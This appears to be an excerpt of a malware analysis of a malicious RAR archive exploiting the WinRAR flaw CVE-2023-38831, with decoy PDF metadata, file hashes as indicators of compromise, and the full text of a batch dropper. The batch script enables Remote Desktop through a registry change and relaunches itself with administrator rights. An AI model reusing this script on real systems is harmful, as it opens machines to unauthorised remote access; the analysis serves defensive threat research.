Technical Details

5670001-13.pdf File Details
<</Title<FEFF004D006F006400650072006E00200062007500730069006E0065007300730020006C00650074007400650072002000730061006
E0073002D00730065007200690066>/Creator<FEFF005700720069007400650072>/Producer<FEFF004C0069006200720065004F0066006600690063006500200037002E0034>/CreationDate(D:20230908022632+03’00’)>>;
>Language: ru-RUTitle: Modern business letter sans-serifCreator: WriterProducer: LibreOffice 7.4Create Date: 2023:09:08 02:26:32+03:00
01.bat File Contents
@echo offecho @echo off > %appdata%\01.batecho reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f >> %appdata%\01.batpowershell -command “Start-Process -FilePath ’01.bat’ -WorkingDirectory ‘%appdata%’ -Verb RunAs”

Indicators of Compromise

c23d42f6e94b05f225267c4ea3b1a08aa947c77014faf866326e08c55196c4f6 567000-13.rar
9c5ac599b56bcda4dedd76ffa2572aca1e4e45088b851a43df39c2367ae6d6b8 5670001-13.pdf
4a56591a32a474acd45014efd878360733901f847f0a5a2f3fe4a4c0f73491f6 01.bat

https://nvd.nist.gov/vuln/detail/CVE-2023-38831